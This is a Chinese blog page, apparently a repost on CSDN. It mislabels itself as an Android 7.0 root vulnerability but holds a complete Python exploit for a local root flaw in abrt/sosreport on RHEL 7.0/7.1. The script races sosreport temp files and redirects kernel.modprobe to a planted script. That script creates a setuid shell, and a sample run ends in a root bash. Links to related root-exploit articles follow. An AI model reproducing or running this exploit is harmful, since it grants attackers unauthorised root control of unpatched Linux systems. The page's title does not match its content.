android7.0 root 漏洞,RHEL 7.0/7.1 - abrt/sosreport Local Root

最新推荐文章于 2024-04-22 02:34:09 发布
最新推荐文章于 2024-04-22 02:34:09 发布
阅读量280 收藏
点赞数
文章标签: android7.0 root 漏洞

#!/usr/bin/python

# CVE-2015-5287 (?)

# abrt/sosreport RHEL 7.0/7.1 local root

# rebel 09/2015

# [user@localhost ~]$ python sosreport-rhel7.py

# crashing pid 19143

# waiting for dump directory

# dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143

# waiting for sosreport directory

# sosreport: sosreport-localhost.localdomain-20151130194114

# waiting for tmpfiles

# tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ']

# moving directory

# moving tmpfiles

# tmpurfpyY -> tmpurfpyY.old

# tmpYnCfnQ -> tmpYnCfnQ.old

# waiting for sosreport to finish (can take several minutes)........................................done

# success

# bash-4.2# id

# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

# bash-4.2# cat /etc/redhat-release

# Red Hat Enterprise Linux Server release 7.1 (Maipo)

import os,sys,glob,time,sys,socket

payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"

pid = os.fork()

if pid == 0:

os.execl("/usr/bin/sleep","sleep","100")

time.sleep(0.5)

print "crashing pid %d" % pid

os.kill(pid,11)

print "waiting for dump directory"

def waitpath(p):

while 1:

r = glob.glob(p)

if len(r) > 0:

return r

time.sleep(0.05)

dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]

print "dump directory: ", dumpdir

os.chdir(dumpdir)

print "waiting for sosreport directory"

sosreport = waitpath("sosreport-*")[0]

print "sosreport: ", sosreport

print "waiting for tmpfiles"

tmpfiles = waitpath("tmp*")

print "tmpfiles: ", tmpfiles

print "moving directory"

os.rename(sosreport, sosreport + ".old")

os.mkdir(sosreport)

os.chmod(sosreport,0777)

os.mkdir(sosreport + "/sos_logs")

os.chmod(sosreport + "/sos_logs",0777)

os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")

os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")

print "moving tmpfiles"

for x in tmpfiles:

print "%s -> %s" % (x,x + ".old")

os.rename(x, x + ".old")

open(x, "w+").write("/tmp/hax.sh\n")

os.chmod(x,0666)

os.chdir("/")

sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")

def trigger():

open("/tmp/hax.sh","w+").write(payload)

os.chmod("/tmp/hax.sh",0755)

try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)

except: pass

time.sleep(0.5)

try:

os.stat("/tmp/sh")

except:

print "could not create suid"

sys.exit(-1)

print "success"

os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')

sys.exit(-1)

for x in xrange(0,60*10):

if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():

print "done"

trigger()

time.sleep(1)

sys.stderr.write(".")

print "timed out"

凹凸头
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Android root源码(利用CVE-2013-6282漏洞
08-25
CVE-2013-6282是一个漏洞编号,该漏洞属于Linux内核级别的漏洞,在android 2.x至4.3之前的版本中同样存在, 可以用于系统提权,获得root权限,属于Linux系统API缺陷。 利用该漏洞,开发Android root程序。
android 7.0 漏洞利用,谷歌 Android 移动操作系统中的零日漏洞被攻击者利用
weixin_31613423的博客
05-31 207
导读谷歌 ProjectZero 研究小组一名成员周四晚表示,攻击者正在利用谷歌 Android 移动操作系统中的零日漏洞,使他们完全控制至少 18 种不同手机,包括 4 种不同型号的谷歌 Pixel 手机。谷歌 ProjectZero 研究小组一名成员周四晚表示,攻击者正在利用谷歌 Android 移动操作系统中的零日漏洞,使他们完全控制至少 18 种不同手机,包括 4 种不同型号的谷歌 Pix...
Android SIGABRT的可能原因及开启手机Log日志
最新发布
2401_84132644的博客
04-22 596
说一千道一万,不如自己去行动。要想在移动互联网的下半场是自己占有一席之地,那就得从现在开始,从今天开始,马上严格要求自己,既重视业务实现能力,也重视基础和原理。基础夯实好了,高楼才能够平地而起,稳如泰山。最后为了帮助大家深刻理解Android相关知识点的原理以及面试相关知识,这里放上相关的我搜集整理的24套腾讯、字节跳动、阿里、百度2020-2021面试真题解析,我把技术点整理成了视频和PDF(实际上比预期多花了不少精力),包知识脉络 + 诸多细节。还有。
android ioctl fuzz,android 本地提权漏洞 android root
weixin_30847865的博客
05-16 150
目前正在研究android 三方设备驱动 fuzzer , 也就是下图所说的 ioctl fuzzing, 下图是由keen team nforest 大神发布; 欢迎正在研究此方面的人联系我共同交流进步!Email: Blind Fuzz Smart Fuzz android 内核栈溢出android slab/slub 类堆溢出android 数组越界导致的复写内核中的重要数据...
AndroidRoot的本质和常用工具及软件,包括知名漏洞zergRush和Gingerbreak
记录和分享程序人生的点点滴滴
12-14 1726
对于Android系统来说,应用程序可以通过获取Androidroot权限,来越过Android系统的限制,从而访问到系统底层或其它应用程序的数据或文件,进程等。这和iOS的越狱的概念差不多。
Android root漏洞分析汇总
漫步者的博客
07-27 730
名称:Exploid 编号:CVE-2009-1185 udev是一个android组件负责USB连接,进程应该只处理kernel发送的device的NETLINK的socket消息,但实际上并未检测NETLINK的socket消息的来源,这样可以广播add device的socket信息,触发硬件处理事件,将恶意代码传入kernel,由其写入设备文件.
rhel-server-7.1-x86-64-dvd.iso文件
02-03
rhel-server-7.1-x86_64-dvd.iso文件
rhel-server-7.1-x86_64-boot.iso + rhel-server-7.1-x86_64-dvd.iso
04-18
资源是Redhat7.1镜像文件的云盘链接,包括rhel-server-7.1-x86_64-boot.iso、rhel-server-7.1-x86_64-dvd.iso和supp-server-7.1-rhel-7-x86_64-dvd.iso 仅供学习交流,严禁用于商业用途,请于24小时内删除
解决Linux虚拟机 devmapper rhel-root爆满问题.docx
07-22
解决Linux虚拟机 devmapper rhel-root爆满问题 本文主要讲解了解决 Linux 虚拟机中 /dev/mapper/rhel-root 爆满问题的步骤。首先,使用 df -h 命令查看磁盘使用情况,发现 /dev/mapper/rhel-root 使用接近爆满状态...
rhel-server-7.0-x86_64操作系统
12-20
rhel-server-7.0-x86_64-dvd 操作系统 网盘下载地址 确保资源可用
RHEL-Server-6/7/8-x86_64-dvd 各版本百度网盘共享
10-14
RHEL,即Red Hat Enterprise Linux的缩写,是Red Hat公司的Linux系统。网盘含内有 rhel 6、7、8、8.1等各版本(已增加 boot.iso)
基于利用方式的Android Root漏洞分析
03-24
Android平台恶意软件可以使用获取系统root权限的方式来绕过传统的Android安全机制,并且由于Android碎片化现象的存在,出现了很多利用方式、范围不同的Android root漏洞,因此有必要详细了解这些漏洞的实现机制,以采取相应的安全对策。基于利用方式将Android root漏洞按照是否可以直接在手机端利用的角度对其分类,评估其威胁程度,并详细描述了现有漏洞提权的实现细节、利用方式以及覆盖的范围,从而为进一步制定漏洞检测方案提供帮助。
android 最新漏洞 root,[原创](Android Root)CVE-2017-7533 漏洞分析和复现
weixin_34711121的博客
05-25 562
本篇主要是记录一下CVE-2017-7533是什么类型的漏洞漏洞原理是什么,以及如何触发,又是如何被patch的。进一步,编译源码刷机(此步骤耗时最为长久),在pixel2上复现。此外,进一步思考如果想要从poc到exploit进一步需要做哪些事情?欢迎对这个漏洞感兴趣的同学一起交流学习~0x00 漏洞原理根据对该CVE的描述信息[1]我们可以知道,这是一个在linux kernel中fsnot...
android7 漏洞,7 月份 Android 安全公告发布,多个严重安全漏洞需尽快修补
weixin_39897505的博客
05-28 209
技术编辑:徐九丨发自 思否编辑部近日,谷歌发布了 2020 年 7 月的 Android 安全公告,并发布了两个安全补丁。本月的补丁修复了几个非常严重的漏洞,推荐厂商和用户尽快安装。其中最严重的漏洞,允许本地恶意应用绕过用户交互要求,以获得额外权限。这意味着用户甚至不需要确定访问权限,恶意应用就可以深入访问用户的手机。此次除了修复框架以及系统层面的漏洞外,还专门针对联发科和高通组件进行了漏洞修复。...
Android提权root漏洞,【转】结合init源码剖析android root提权漏洞(CVE
weixin_42602241的博客
05-29 939
这篇文章是上一篇博客的后续分析,主要介绍向init进程发送热拔插信息后init进程的处理流程首先我们来了解一个数据结构,uevent,如下struct uevent {const char *action;const char *path;const char *subsystem;const char *firmware;int major;int minor;};内核收到的信息如下,ACTIO...
Android提权root漏洞,Android Binder Driver UAF 漏洞实现 Root 提权分析(CVE-2019-2215) - 嘶吼 RoarTalk – 回归最本质的信息安全,互...
weixin_28679635的博客
05-29 1217
0x00 漏洞描述当Project Zero紧急发布CVE-2019-2215漏洞公告时,我决定将漏洞利用代码复制到本地设备上进行复现分析。我正好有一个存在漏洞的Pixel 2手机。我需要做的就是编译漏洞exp并通过ADB运行exp代码。我下载了最新的Android NDK并编译了PoC:[grant~/Downloads/android-ndk-r20>>./toolchai...
自编译安卓系统分析Android内核漏洞(一)
Tesi1a的充电桩
03-22 824
目标 编译Android4.4.3-r1源码及内核 0x00 环境 手机环境: nexus5 + Kernel3.4.0+Android4.4.3_r1 虚拟机编译环境: Vmware + Ubuntu 14.04 0x01 编译android系统 1. 先下源码 先下载 repo 工具: repo init -u http...
android6.0漏洞root,脏牛漏洞ROOT全部安卓系统?
weixin_42411003的博客
05-27 1300
原标题:脏牛漏洞ROOT全部安卓系统?上周,研究人员Phil Oester发现 “脏牛”漏洞,影响范围甚广,波及到2007年发布的Linux内核,一时间名声大噪。脏牛漏洞,编号为CVE-2016-5195,是Linux内核运行时出现的竞争条件,允许攻击者实现本地提权。简而言之,攻击者利用脏牛可获得Linux设备的root权限。(详情请参考此前漏洞盒子发布的漏洞预警)影响所有Android版本脏牛...
android 最新漏洞 root,新漏洞可获取root权限 所有安卓机躺枪
weixin_39832829的博客
05-25 902
原标题:新漏洞可获取root权限 所有安卓机躺枪【中关村在线软件资讯】10月25日消息:Android系统的安全问题可以用源源不断来形容,最近一个新的严重漏洞被发现,该漏洞甚至可以获取root权限。安全专家David Manouchehri日前公布了这个名为脏牛(Dirty COW)的Linux漏洞的源代码,该漏洞允许攻击者在内核操作中不断提升自己的权限并作为合法用户来执行远程代码。该漏洞由安全专...
dev/mapper/rhel-root
08-02
/dev/mapper/rhel-root是一个文件系统的路径,用于表示Red Hat Enterprise Linux系统中的根分区。在扩容之前,需要先扩展虚拟机硬盘,并在Linux系统上进行操作。首先,使用fdisk -l命令查看当前分区情况,然后使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值